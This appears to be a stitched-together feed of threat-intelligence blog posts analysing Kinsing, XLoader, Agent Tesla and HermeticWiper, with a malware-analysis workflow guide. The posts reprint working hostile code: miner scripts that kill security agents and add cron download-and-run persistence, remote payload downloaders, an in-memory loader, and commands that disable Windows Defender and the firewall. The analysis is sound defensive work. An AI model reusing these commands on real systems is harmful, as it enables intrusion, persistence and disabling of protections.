  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i ‘[y]unjing’; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

Next, it starts to kill processes that connect to specific IP addresses. Not sure about the significance of the IP addresses (185.71.65.238, 140.82.52.87, 34.81.218.76, 42.112.28.216, 207.38.87.6, 42.112.28.216). For example:

netstat -anp | grep 185.71.65.238 | awk ‘{print $7}’ | awk -F'[/]’ ‘{print $1}’
| xargs -I % kill -9 %

And it kills processes connecting to various ports regardless of the IP (143, 2222, 3333,3389, 4444, 5555, and more). As many miner scripts do, it also has a long list of process names it kills like:

pkill -f .javae
pkill -f .syna
pkill -f .main
pkill -f xmm
pkill -f solr.sh

It appears to kill competing miners and some valid processes, maybe to free up CPU cycles for the miner or to eliminate competitors masquerading as a valid process. It even goes so far as to check if any miners are running inside docker:

docker ps | grep “auto” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “xmr” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “mine” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “monero” | awk ‘{print $1}’ | xargs -I % docker kill %
docker ps | grep “slowhttp” | awk ‘{print $1}’ | xargs -I % docker kill %

Finally, we get to download the miner:

BIN_MD5=”2c44b4e4706b8bd95d1866d7867efa0e”
BIN_DOWNLOAD_URL=”http://185.231.153.4/kinsing”
BIN_DOWNLOAD_URL2=”http://185.231.153.4/kinsing”
BIN_NAME=”kinsing”

This malware is nothing new and well known to Virustotal [1]

The malware achieves persistence by adding a cron job:

echo “* * * * * $LDR http://185.191.32.198/wb.sh | sh > /dev/null 2>&1”

In summary:

Specifically, disabling the Alibaba Cloud monitoring tools is new to me. I didn’t see any other endpoint security tools disabled (sure, things like SELinux and such, but no AV tools). Maybe I missed some among the long list of “kill” commands. But essentially, this script is targeting Alibaba Cloud users and assuming the machine they are breaching is pretty much unused and nobody but Alibaba is monitoring it.

[1] https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Summary On February 23rd, the UK National Cyber Security Center (NCSC) with the US Cybersecurity &Infrastructure Security Agency (CISA) and other security agencies released information

large.png

 File sharing is a classic operation performed by many people on a daily basis. If you can share files using big players like Dropbox or all the *Drive (“One”, “Google”, etc), there exists a lot of free alternatives that help to easily share files with peers. Because, still today, many organizations do not provide an “official” (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available like Lufi[1] or transfer.sh[2] (they are plenty of others). The sample that I spotted yesterday was delivered through the second one.

The initial payload was a gzip’d RAR archive (SHA256:949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc)

remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file –
/dev/stdin: RAR archive data, v5
remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files

UNRAR 5.50 freeware Copyright (c) 1993-2017 Alexander Roshal

Testing archive Files

Testing COMPILLED LIST OF ITEMS.vbs OK
Testing Item’s Specification & Drawings.vbs OK
Testing Company’s Introduction.vbs OK
All OK

All three files in the archive are the same. Here is the (beautified) code:

KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = “W”&”s”&”c”&”r”&”i”&CHR(80)&”t.”&”s”&”h”&CHR(69)&”l”&”l”
Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDS
KJDSKDDKJEKJDKJDJKDKJDSJKDS)
SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = “PoWERsh”
HDFHKFDKHHKDFHKHDFHKK = “E”
GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = “”+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+”LL -exeC
utiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG(‘hxxps://transfer[.]sh/get/z16it2/rraammm.ps1’) ”
HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0

Pretty simple, it fetches the next payload through a share on transfer.sh.

hxxps://transfer[.]sh/get/z16it2/rraammm.ps1

The Powershell code is:

$whatever = “dXNpbmcgU3lzd … (stuff deleted) … b3NlKCk7fX19”;
$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));
Add-Type -TypeDefinition $dec;
$instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU;
$instance.HxQcKKablTACrmEGBODiYOG
hW();

$whatever contains another payload used to inject the PE and execute it:

using System;using System.IO;using System.Net;
using System.Reflection;using System.Threading;
namespace SKWTFPdZCH.DpGVQhBvSm
{
  public class HqEHXQYiIxCnIoaXttSHgHoMU
{
  private const string VhuixZgiqqTTIkrGvgRwUtDFE=”hxxps://transfer[.]sh/get/ACEDn1/sdr.exe”;
  private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS=new MemoryStream();
  [STAThread] public void HxQcKKablTACrmEGBODiYOGhW()
{
  gmrjNtqiFbYCZLoofQZiMGGJt();
  imYCaeLWaNVtuIupBojHByURJ();
  }
private void imYCaeLWaNVtuIupBojHByURJ()
{
  byte[]buffer=XaXaVkSGstrUmNTeLpgVnccuS.ToArray();
  Assembly assembly=null;
  if(Environment.Version.Major>=4)
{
  MethodInfo method=Type.GetType(“System.Reflection.RuntimeAssembly”).GetMethod(“nLoadImage”,BindingFlags.NonPublic|BindingFlags.Static);
assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false,false,null});
  }
  else
{
  MethodInfo method=Type.GetType(“System.Reflection.Assembly”).GetMethod(“nLoadImage”,BindingFlags.NonPublic|BindingFlags.Static);
  assembly=(Assembly)method.Invoke(null,new object[]{buffer,null,null,null,false});
  }
object[]args=new object[1];
  if(assembly.EntryPoint.GetParameters().Length==0)
args=null;
  assembly.EntryPoint.Invoke(null,args);
  }
private void gmrjNtqiFbYCZLoofQZiMGGJt()
{
  WebRequest request=WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE);
  WebResponse response=request.GetResponse();
  using(Stream web_stream=response.GetResponseStream())
{
  byte[]buffer=new byte[8192];
  int read=0;
  while((read=web_stream.Read(buffer,0,buffer.Length))>0)
{
  XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer,0,read);
  }
  }
response.Close();
  }
  }
}

The final payload (sdr.exe) is again downloaded from transfer.sh. It’s an XLoader[3] sample.

It could be interesting to hunt for such file-sharing services in your logs… From a security point of view, Lufi is nice because all crypt/decrypt operations are performed on the client-side and the server does not see the content of shared files. However, this prevents files to be downloaded by headless browsers. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is better for attackers because they don’t have to compromise a website to drop their malicious content. Note that a Lufi instance could be perfectly used in a phishing campaign (via a link in the mail).

I’m running my own instance of Lufi as a honeypot and keeping an eye on it but, until now, it was never abused…

[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

HermeticWiper.jpg

Written by: Vikram Navali – Senior Technical Product Manager, As the Ukraine-Russia conflict is gathering attention from everyone worldwide, a massive data-wiping malware called HermeticWiper hit multiple organizations in Ukraine. According to ESET researchers, threat actors have been in preparation for a couple of months before they could launch a full-fledged attack.

Background of the HermeticWiper Malware Attack

As per Cisco’s Threat advisory report, the deployment of the destructive HermeticWiper malware began on Feb. 23, 2022. HermeticWiper is a malware type that can erase all the data from a victim’s system. The research also revealed that the wiper abuses legitimate drivers from the EaseUS Partition Master software to corrupt data. The Wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd.

How Impactful is the HermeticWiper Malware?

This malware is quite impactful and different from other malware types that destroy data recovery tools without leaving any attack traces.

The malware has two components designed for destruction: one that targets the Master Boot Record (MBR) and another targeting partitions.

The wiper process begins by gaining SeShutDownPrivilege (to shut down the endpoint once it’s wiped the drives) and SeBackupPrivilege (to retrieve file contents for files whose security descriptor does not grant such access).

The wiper corrupts the MBR for every physical drive, enumerates individual partitions, and corrupts the partition data after destroying the Volume Shadow Copy Service (VSS) and corrupting other files necessary for file system operations. It then initiates a reboot to complete the wipe.

The research also discovered that threat actors have already compromised the Active Directory (AD) infrastructure in one of the Ukrainian’s targeted organizations and dropped the wiper via a default group policy object (GPO). They have gathered information on Group Policy settings and identified paths for privilege escalation.

How Can Attivo Networks Solution Help?

Attivo Networks solutions offer advanced protection for Active Directory, identifying specific domain, computer, and user-level risks and detecting live attacks. The ADSecure solution prevents Active Directory compromise by concealing objects in AD and stopping attacks that target them. The ADAssessor solution helps identify vulnerabilities in Active Directory Group Policy Preferences and permissions allow threat actors to perform privilege escalation. Additionally, the solution can deploy deceptive SYSVOL Group Policy Objects in the production AD infrastructure. The solution detects and raises high-fidelity alerts when an attacker collects GPO information to determine a potential attack path.

The EDN capabilities detect Indicators of Compromise (IoC) such as file deletion, shadow volumes deletion, etc., and prevent the malware from deleting backup files created using Windows Volume Shadow Copy Service (VSS).

Additionally, Attivo Networks provides simple and flexible deployment solutions to identify threats and remediate them quickly. For more information, please visit https://www.attivonetworks.com/solutions/threat-detection/active-directory-protection/. 

Sign up for free trial offers on Active Directory security assessments and continuous visibility to AD vulnerabilities.

Conclusion

In the current situation of the Ukraine crisis, it is crucial to understand how cyber security can play a more significant role in safeguarding digital information against malicious or accidental threats. Organizations must implement a defense-in-depth strategy and deploy cyber security solutions across several barriers to prevent malicious activity.

The post HermeticWiper: A New Data Wiper Malware Targeting Ukraine Systems appeared first on Attivo Networks.

isc-20220222-1.png

Here is another sample demonstrating how attackers still rely on good old vulnerabilities…  In 2017, Microsoft Office suffered from a critical vulnerability that affected its Equation Editor tool, known as CVE-2017-11882[1]. It’s a memory corruption vulnerability that leads to remote code execution, pretty bad. It was heavily exploited at this time and I was curious to find a new document spread with the same good old vulnerability.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.

Efficient analysis of new executable samples is extremely important when sharing information on evolving threats

Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from prioritizing based on the article’s focus, it also allows the analysis to done by a group, with different people focusing on different parts of functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the blackbox-style analysis that generally involves the execution of a sample under various monitoring tools and on sandboxes. The Dynamic Analysis step refers the use of a debugger to execute instructions.

Steps

Actions

1. Triage

Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, import table or syscalls and strings to understand if it likely to be packed or not.

Check if some official (non-malicious) packers were used by using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not necessarily present, some malware developers prefer to only use obfuscation.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to Virustotal, so all cybersecurity community members could benefit from access and were able to see AV vendors’ detections as well as the sandbox logs in the Behavior tab. Note that there are now multiple sandboxes supported in Virustotal, so try a few to find a good report.

Multiple sandbox options on Virustotal.

Multiple sandbox options on Virustotal.

A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.

A high-entropy block

A high-entropy block.

There are pretty much no meaningful strings and APIs:

PCB overview of the Verkada D40 camera.

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with custom community signatures) confirms that there is no indication that public packers have been used in this case.

PEiD did not identify any known packers

PEiD did not identify any known packers.

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler, we can see that this doesn’t seem to be the next stage payload as there is no control transfer to it or related blocks. In addition, a quick look around the disassembly confirms that the sample is indeed obfuscated rather than packed with multiple APIs resolved dynamically by hashes and with strings encrypted.

API resolution by hashes

API resolution by hashes.

A call to the not-yet-resolved API

A call to the not-yet-resolved API.

Step 4: Static and Dynamic Analysis of the Actual Functionality

In order to be able to efficiently navigate the disassembly, we need to make APIs and strings easily readable.

For APIs, this is very easy to achieve with dynamic analysis as all the APIs are resolved in a single function. Therefore, letting it execute until the end will give us all the APIs’ addresses. To propagate their names to the pointers, use standard renimp.idc script shipped as part of IDA Pro.

Resolved APIs’ names

Resolved APIs’ names.

This approach won’t work for strings, as they’re decrypted on an ad-hoc basis just before being used, rather than in a single place. Therefore, to make them easily visible, scripting will be required. In our blog on Darkside, we have already provided such a script that will attempt to find all the encrypted strings and decrypt them.

Before string decryption

Before string decryption.

After string decryption.

After string decryption.

That’s it. Now when both strings and APIs are visible, the only thing left to engineer is to carefully go through cross references and keep the markup for the corresponding functions describing all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

icon-lightbulb.png

Extra Tips

Know your audience – the content of the technical blog post (and the corresponding questions to answer) will be very different from a news article for the general public
Consider teamwork to speed up the process – Asking for help if at an early stage helps increase the total time available for the analysis
Have your templates ready – simple scripts to decrypt / decode / decompress the data may help avoid unnecessary delays

Related Content

OT IoT Security 2021 1H Research Report

RESEARCH REPORT
OT/IoT Security Report

What You Need to Know to Fight Ransomware and IoT VulnerabilitiesJuly 2021

RANSOMWARE

Why ransomware is a formidable threat
How Ransomware as a Service works
Analysis of DarkSide, the malware that attacked Colonial Pipeline

VULNERABILITIES

Latest ICS and medical device vulnerability trends

IoT SECURITY CAMERAS

Why P2P security camera architecture threatens confidentiality
How security cameras are vulnerable
Research findings on surveillance cameras

RECOMMENDATIONS

Ten measures to take immediately to defend your systems

Download

Related Links

Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

cccs-banner.png

Original release date: January 16, 2022

Microsoft has released a blog post on possible Master Boot Record (MBR) Wiper activity targeting Ukrainian organizations, including Ukrainian government agencies. According to Microsoft, powering down the victim device executes the malware, which overwrites the MBR with a ransom note; however, the ransom note is a ruse because the malware actually destroys the MBR and the targeted files.
 
CISA recommends network defenders review the Microsoft blog for tactics, techniques, and procedures, as well as indicators of compromise related to this activity. CISA additionally recommends network defenders review recent Cybersecurity Advisories and the CISA Insights, Preparing For and Mitigating Potential Cyber Threats.

 

 

This product is provided subject to this Notification and this Privacy & Use policy.

isc-20220105-1.png

Code re-use is classic behavior for many developers and this looks legit: Why reinvent the wheel if you can find some pieces of code that do what you are trying to achieve? If you publish a nice piece of code on platforms like GitHub, there are chances that your project will be used and sometimes forked by other developers who will add features, fix issues, etc. That’s the magic of the Internet. But attackers are also looking for interesting code to borrow on GitHub. A few weeks ago, I wrote a diary about Excel Add-In’s[1] used to distribute malware.

Since any Office document that may contains macros can potentially be used by malware authors with similar result as the usual Excel spreadsheet with macros, threat actors have most probably utilized all of the available macro-enabled Office formats for attacks at some point. However, since most users would probably view PowerPoint slideshow asking them to enable macros with a not insignificant level suspicion, most attackers tend not to use any of PowerPoint file formats at all.

Over the past few months, I have nevertheless noticed an unusual increase in the number of malicious PowerPoint attachments caught in my (mal)spam trap. Although the use of malicious PowerPoint is nothing new[1], given the reasons mentioned above, it has never been too common, so I thought it might be worthwhile to take a look at an example of a recent malspam campaign that spread the Agent Tesla infostealer using a macro-enabled PowerPoint file.

The file in question was named SKM-03753WIRE23560USD.ppam and was distributed as an attachment of an e-mail that tried to make it appear as a wire transfer receipt.

You may have noticed that the filename ended in an unusual extension PPAM. This extension is used for PowerPoint Add-ins with macros[2], a special format for extending functionalities of PowerPoint presentations. Although there are some differences in content between PPAM and the more usual PPTM files, these don’t concern macros. Therefore, if we only care about the embedded VBA code, as in this instance, we may analyze a PPAM using oledump[3], or any other tool we would normally use to parse macro-enabled Office documents.

In this instance, the file turned out to contain only one small, slightly obfuscated VBA script:

Sub Auto_Open()
Set Outlook = CreateObject(yOCaKOVzT(“V|{svvr5Hwwspjh{pvu”, “7”))
Set Microsoft = Outlook.CreateObject(yOCaKOVzT(“^zjypw{5Zolss”, “7”))
Set MicrosoftExec = Microsoft.Exec(yOCaKOVzT(“rqygt”, “2”) + yOCaKOVzT(“ynkrr4k~k&”, “6”) + Chr(150) + yOCaKOVzT(“_qvlw[|tm(Pqllmv”, “8”) + yOCaKOVzT(“$1g$”, “4”) + yOCaKOVzT(“kBdqvlw{d{{|mu;:dkitkd66du{p|i(p||x{B77pipipippi{lHr6ux7”, “8”) + “chrehghghghghghghghghghcre”)
MsgBox (MicrosoftExec.StdOut.ReadAll)
End Sub
Public Function yOCaKOVzT(dghKkkXkS As String, NdffEcveP As Integer)
Dim Pp6IFCPL9 As Integer
For Pp6IFCPL9 = 1 To Len(dghKkkXkS)

Dim tHvckljoMTaERQgkne As Boolean
Mid(dghKkkXkS, Pp6IFCPL9, 1) = Chr(Asc(Mid(dghKkkXkS, Pp6IFCPL9, 1)) – NdffEcveP)

Next Pp6IFCPL9

Dim TMydgBdhyraoOOowKm As Byte
yOCaKOVzT = dghKkkXkS

End Function

Since the function yOCaKOVzT only subtracts the value provided in the second argument from each byte in the string provided as the first argument, deobfuscation of the script is fairly straightforward and leads to the following code.

Sub Auto_Open()
Set Outlook = CreateObject(“Outlook.Application”)
Set Microsoft = Outlook.CreateObject(“Microsoft = Wscript.Shell”)
Set MicrosoftExec = Microsoft.Exec(“MicrosoftExec = powershell.exe -WindowStyle Hidden -c c:windowssystem32calc..mshta hxxps://hahahahhasd@j[.]mp/chrehghghghghghghghghghcre”)
MsgBox (MicrosoftExec.StdOut.ReadAll)
End Sub

As we may see, the VBA script is a simple downloader, that is supposed execute PowerShell code, which will grab a file from hxxps:j[.]mp/chrehghghghghghghghghghcre (which redirects to hxxps://download2389.mediafire[.]com/ya9tv6zqa1zg/95ggilwnqccbq6l/20.doc) and execute it using the Microsoft HTML Application host (MSHTA).

After cleaning the downloaded file 20.doc up a bit, it came down to the following VBScript:

pink = “pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i’E’x(iwr(‘hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_2e35a24e3e7b4efba4867a06c6271f32.txt?dn=rendomtext’) -useB);
i’E’x(iwr(‘hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_92ec48660f134f3bb502662383ca4ffb.txt?dn=rendomtext’) -useB);”

Const tpok = &H80000001
lopaskkk = “.”
Set kasodkmwm = GetObject(“winmgmts:\” & lopaskkk & “rootdefault:StdRegProv”)
poloaosd = “SOFTWAREMicrosoftWindowsCurrentVersionRun”
akosdwdjdw = “cjjhkloggw”
kasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink
set MicrosoftWINdows = GetObject(StrReverse(“B0A85DF40C00-9BDA-0D11-0FC1-22CD539F:wen”))
MicrosoftWINdows _
. _
RUn _
pink,0

args = “/create /sc MINUTE /mo 63 /tn “”””kbnvmmmhjo”””” /” & _
“F /tr “”””””””M” & “s” & “H” & “t” & “A””””””””hxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html”””””
hxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html


magolia = "."
Set Pologachi = GetObject("winmgmts:\" & magolia & "rootdefault:StdRegProv")
threefifty = "SOFTWAREMicrosoftWindowsCurrentVersionRun"
Magachuchugaga = "pilodkis"
pathanogalulu = calc """hxxp://www.starinxxxgkular.duckdns[.]org/s1/20.txt"""
Pologachi.SetStringValue halaluya, threefifty, Magachuchugaga, pathanogalulu


Going down from the top, the script it is supposed to:

Download and execute two files containing PowerShell script from usrfiles.com (we’ll look at those in a moment).
Ensure persistence using the registry Run key by creating a value containing the same PowerShell script as we mention in 1. It also created another value in the same key, which was supposed to run a file from http[:]//www.starinxxxgkular.duckdns[.]org using MSHTA (although the link was already dead at the time of the analysis , it may be reasonable assumed that this was supposed to be additional persistence mechanism).

Ensure persistence using Scheduled Task named kbnvmmmhjo, which was supposed to run a file using MSHTA from hxxps:// kdaoskdokaodkwldld.blogspot[.]com.

The first PowerShell script mentioned above was lightly obfuscated and contained what we may think of as the “main payload” – two GunZipped PE files in separate byte arrays (an “injector” and the actual Agent Tesla executable) and the code to decompress them and use the “injector” in the second byte array to execute the main Agent Tesla file. The following code is a portion of its deobfuscated content:

[byte[]] $byteArray1 = @(31,139,...,94,3,0)
[byte[]] $byteArray2 =@(31,139,...,228,0,0)
[byte[]] $decompressedArray1 = Get-DecompressedByteArray $byteArray1
[byte[]] $decompressedArray2 = Get-DecompressedByteArray $byteArray2
[Reflection.Assembly]::Load($decompressedArray2).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object[]] ( 'C:WindowsMicrosoft.NETFrameworkv2.0.50727aspnet_compiler.exe',$decompressedArray1))

Both of the executables were written in .NET (as is usual for Agent Tesla) and both were fairly heavily obfuscated, as you may see from the following images.


Injector code – the Execute method


Excerpt from the list of methods in the Agent Tesla executable

Nevertheless, with a little bit of deobfuscation, it is possible to see that the injector is supposed to inject the Agent Tesla code into the hollowed out aspnet_compiler.exe process (a technique which Agent Tesla has been known to use[4]). And even without understanding the names of methods and variables in the main Agent Tesla code, some portions of it are fairly clear, such as the following excerpt from the key-logging method.

The last file we didn’t take a closer look at was the second PowerShell script downloaded by the second stage of the infection chain.

$down = New-Object System.Net.WebClient
$url = 'hxxps://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe';
$file = 'C:UsersPublicNSudo.exe';
$down.DownloadFile($url,$file);
$kasodkaosd = New-Object System.Net.WebClient
$kasodkaosdsdmaowdk = 'hxxps://www.mediafire[.]com/file/qh5j3uy8qo8cpu7/FINAL+MAIN+vbs+-+Copy.vbs/file';
$kasdjwkdo = 'C:UsersPublicheheheheh.vbs';
$kasodkaosd.DownloadFile($kasodkaosdsdmaowdk,$kasdjwkdo);
Function script:Set-INFFile {
[CmdletBinding()] Param (
[Parameter(HelpMessage="Specify the INF file location")] $InfFileLocation = "$env:tempCMSTP.inf",

[Parameter(HelpMessage="Specify the command to launch in a UAC-privileged window")] [String]$CommandToExecute = 'wscript.exe C:UsersPublicheheheheh.vbs'
)

 

Since this script is only slightly obfuscated, we may clearly see that it is supposed to download NSudo[5] (a privilege escalation utility) and a VBS file hosted on mediafire.com, which it it then supposed to execute using WScript.

This final VBS is not obfuscated at all, and it can be clearly seen that it is basically supposed to disable the anti-malware protection with (among other techniques) the use of the NSudo tool which was previously downloaded.


Set objShell = CreateObject("Wscript.Shell")
objShell.Run "C:UsersPublicNSudo.exe -U:T -ShowWindowMode:Hide sc delete windefend"


outputMessage("Add-MpPreference -ExclusionProcess powershell.exe")
outputMessage("Add-MpPreference -ExclusionProcess mshta.exe")
outputMessage("Add-MpPreference -ExclusionProcess cmd.exe")
outputMessage("Add-MpPreference -ExclusionProcess wscript.exe")
outputMessage("Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend")


outputMessage("netsh advfirewall set allprofiles state off")
outputMessage("Stop-Service -Name WinDefend -Confirm:$false -Force")
outputMessage("Set-Service -Name WinDefend -StartupType Disabled")
outputMessage("sc delete windefend")

Sub outputMessage(byval args)


errReturn = objProcess.Create( "powershell " + args, null, objConfig, intProcessID)
End Sub

As we may see from the following diagram, the very simple macro, which was contained in the PPAM file, lead to a fairly complex infection chain in the end…

This is not the end of the story, however, since one additional point which deserves a small mention is the reuse of open-source code in the infection chain.

Although reuse of code from GitHub or StackOverflow is ubiquitous among both legitimate developers and malware authors alike, in this case, unmodified “borrowed” code was used quite heavily. For example, the GunZip algorithm used by the third (PowerShell) stage was taken from GitHub, as was a UAC bypass used to execute the final VBS script[6]. Since in both of these instances, the foreign code made up a significant portion of the analyzed file, not having to examine it too deeply sped up the entire analysis greatly.

Therefore, I will offer one parting advice which can be useful especially to any junior security analysts out there. If you ever see a line in a malicious code, which doesn’t seem to belong there (e.g., a call to a function which is supposed to display a visible error message to the user) try to ask Google whether it hadn’t seen it somewhere else. In some cases, you will come up empty, as such code might have been included on purpose by the malware author in an attempt to obfuscate the real functionality of the program, however, in other instances you may find that a significant portion of the code in front of you has been reused, and you might not have to spend time on going into it any deeper than just to gather the basic understanding of its main function.

 

Indicators of Compromise (IoCs)

URLs
hxxps://j[.]mp/chrehghghghghghghghghghcre
hxxps://download2389.mediafire[.]com/ya9tv6zqa1zg/95ggilwnqccbq6l/20.doc
hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_2e35a24e3e7b4efba4867a06c6271f32.txt
hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_92ec48660f134f3bb502662383ca4ffb.txt
hxxp://www.starinxxxgkular.duckdns[.]org/s1/20.txt
hxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html
hxxps://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe
hxxps://www.mediafire[.]com/file/qh5j3uy8qo8cpu7/FINAL+MAIN+vbs+-+Copy.vbs/file

Files

20.doc
MD5 - 425244233f21dac6f4395ab0c8c0c03e
SHA1 - 003db538810e74ad74f33b2c69cfa85026e529fd

8db3b9_2e35a24e3e7b4efba4867a06c6271f32.txt
MD5 - cc60f4380686f2216bce3e8a287fc705
SHA1 - 569eed2060bb0b669a7ae12f1e6c04649785bc11

8db3b9_92ec48660f134f3bb502662383ca4ffb.txt
